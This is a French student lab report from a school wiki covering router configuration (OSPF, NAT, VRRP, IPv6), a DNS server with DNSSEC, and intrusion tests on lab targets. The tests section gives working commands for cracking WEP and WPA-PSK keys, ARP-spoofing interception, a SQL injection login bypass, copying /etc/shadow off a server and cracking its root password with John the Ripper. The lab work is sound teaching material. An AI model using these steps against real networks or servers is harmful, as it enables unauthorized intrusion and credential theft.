Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (16/11/2020)==&lt;br /&gt;
(En collaboration avec le groupe 14)&lt;br /&gt;
&lt;br /&gt;
On connecte physiquement l'ISR au SDSL: Dans le local technique SR52, on repere sur quel port est branché le l'ÍSR pour le mettre dans le VLAN 531&lt;br /&gt;
 conf t&lt;br /&gt;
 int Gi0/37&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 531&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Sur l'ISR:&lt;br /&gt;
* On creer le vlan 531:&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 531&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
Le service SSH était activé par defaut.&lt;br /&gt;
Il faut juste autoriser la connexion en root dans le fichier /etc/ssh/sshd_config&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
puis systemctl restart sshd&lt;br /&gt;
&lt;br /&gt;
et on peut se connecter a notre vm&lt;br /&gt;
 ssh root@193.48.57.188&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.local, en suivant le cours nous avons modifié et/ou ajouté:&lt;br /&gt;
 options{&lt;br /&gt;
 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32 ;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Puis nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La documentation de ce point est disponible sur demande en contactant un membre du binôme.&lt;br /&gt;
&lt;br /&gt;
===Verifications===&lt;br /&gt;
https://www.trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La configuration a été réalisé en suivant les instructions dans le sujet de TP rubrique : 4.4  Sécurisation de serveur DNS par DNSSEC&lt;br /&gt;
&lt;br /&gt;
Premièrement nous avons modifié le ficher named.conf.options pour y ajouter l'options suivantes:&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite crée un repertoir trompettedelamort.dnssec afin d'y générer les clefs. Nous devons générer une paire de clef KSK et une paire de clef ZSK.&lt;br /&gt;
&lt;br /&gt;
Pour créer la paire de clef KSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Et pour la paire de clef ZSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Nous renommons ces paires avec comme prefixe trompettedelamort.site et comme suffice -zsk pour la paire zsk et -ksk pour la paire ksk et nous terminon avec .key pour les clefs publiques et .private pour les clefs privées.&lt;br /&gt;
&lt;br /&gt;
Ensuite dans notre fichier zone db.trompettedelamort.site nous ajoutons les lignes suivantes sans oublier d'incrémenter le  Serial:&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-zsk.key&lt;br /&gt;
&lt;br /&gt;
Le fichier db.trompettedelamort.site ressemble donc à cela:&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @ 	IN	SOA	 ns1.trompettedelamort.site.  postmaster.trompettedelamort.site.(&lt;br /&gt;
 			      8		; Serial&lt;br /&gt;
 			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.trompettedelamort.site.&lt;br /&gt;
 @	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @	IN	MX	100 ns1.trompettedelamort.site.&lt;br /&gt;
 ns1	IN	A       193.48.57.188&lt;br /&gt;
 www	IN	A	193.48.57.188	&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les enregristrement de la zone avec la commande suivante:&lt;br /&gt;
 dnssec-signzone -o trompettedelamort.site -k trompettedelamort.site-ksk ../db.trompettedelamort.site trompettedelamort.site-zsk&lt;br /&gt;
Ce qui a pour effet de générer un fichier zone &amp;quot;db.trompettedelamort.site.signed&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous n'avons donc plus qu'a remplacer db.trompettedelamort.site par db.trompettedelamort.site.signed dans le fichier named.conf.local:&lt;br /&gt;
 root@trompettedelamort:~# cat /etc/bind/named.conf.local   &lt;br /&gt;
 //&lt;br /&gt;
 // Do any local configuration here&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site.signed&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
 // Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
 // organization&lt;br /&gt;
 //include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne reste plus qu'a fournir la clef publique de la clef KSK à gandi.net. Pour se faire il faut se rendre dans &amp;quot;DNSSEC&amp;quot; puis dans &amp;quot;Add an external key&amp;quot;, choisir KSK et &amp;quot;RSA/SHA-1&amp;quot; et renseigner la clef se trouvant dans&lt;br /&gt;
 /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key &lt;br /&gt;
&lt;br /&gt;
On vérifie avec la commande suivante:&lt;br /&gt;
 dnssec-verify -o trompettedelamort.site db.trompettedelamort.site.signed&lt;br /&gt;
 &lt;br /&gt;
Qui nous renvoie ce résultat:&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.trompettedelamort.site.signed&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=54044</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=54044"/>
				<updated>2020-11-30T13:52:39Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* 4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
